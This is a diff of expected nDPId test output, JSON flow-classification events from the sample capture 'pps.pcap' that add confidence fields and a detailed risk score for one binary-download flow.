+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139627,"flow_last_seen":1467353139779,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":332,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139662,"flow_last_seen":1467353139771,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1467353139819,"flow_last_seen":1467353142600,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":2080,"flow_avg_l4_payload_len":520,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140709,"flow_last_seen":1467353140888,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":517,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140628,"flow_last_seen":1467353140677,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1186,"flow_avg_l4_payload_len":593,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140655,"flow_last_seen":1467353140720,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":1032,"flow_avg_l4_payload_len":516,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353141138,"flow_last_seen":1467353141308,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":705,"flow_avg_l4_payload_len":352,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147705,"flow_last_seen":1467353147794,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":254,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147927,"flow_last_seen":1467353148016,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":356,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353150114,"flow_last_seen":1467353150272,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7440000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157468,"flow_last_seen":1467353157533,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353165300,"flow_last_seen":1467353165845,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":3117,"flow_avg_l4_payload_len":519,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353172912,"flow_last_seen":1467353180202,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1930,"flow_avg_l4_payload_len":643,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353180357,"flow_last_seen":1467353180443,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353185940,"flow_last_seen":1467353186002,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":774,"flow_avg_l4_payload_len":387,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157468,"flow_last_seen":1467353157533,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353165300,"flow_last_seen":1467353165845,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":3117,"flow_avg_l4_payload_len":519,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353172912,"flow_last_seen":1467353180202,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1930,"flow_avg_l4_payload_len":643,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353180357,"flow_last_seen":1467353180443,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353185940,"flow_last_seen":1467353186002,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":774,"flow_avg_l4_payload_len":387,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353202192,"flow_last_seen":1467353202428,"flow_idle_time":7440000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":3039,"flow_avg_l4_payload_len":607,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4":"Binary application transfer"},"proto":"Unknown","breed":"Unrated","category":"Download"}}
+00782{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353202192,"flow_last_seen":1467353202428,"flow_idle_time":7440000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":3039,"flow_avg_l4_payload_len":607,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"proto":"Unknown","breed":"Unrated","category":"Download"}}
 00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.37.142.173","src_port":22793,"dst_port":1074,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.37.142.173","src_port":22793,"dst_port":1074,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00632{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1467353136440,"flow_last_seen":1467353136952,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":12973,"flow_avg_l4_payload_len":288,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"219.228.107.156","src_port":22793,"dst_port":1250,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.233.39.81","src_port":22793,"dst_port":18590,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.233.39.81","src_port":22793,"dst_port":18590,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353138931,"flow_last_seen":1467353139050,"flow_idle_time":7440000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":690,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":671,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353138931,"flow_last_seen":1467353139050,"flow_idle_time":7440000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":690,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":671,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136838,"flow_last_seen":1467353136838,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.133.182","src_port":22793,"dst_port":17788,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136838,"flow_last_seen":1467353136838,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.133.182","src_port":22793,"dst_port":17788,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00643{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165563,"flow_last_seen":1467353165659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":379,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353144819,"flow_last_seen":1467353144913,"flow_idle_time":7440000,"flow_min_l4_payload_len":229,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":619,"flow_avg_l4_payload_len":309,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165563,"flow_last_seen":1467353165659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":379,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353144819,"flow_last_seen":1467353144913,"flow_idle_time":7440000,"flow_min_l4_payload_len":229,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":619,"flow_avg_l4_payload_len":309,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.227.170.88","src_port":22793,"dst_port":20227,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.227.170.88","src_port":22793,"dst_port":20227,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"121.248.133.93","src_port":22793,"dst_port":12757,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
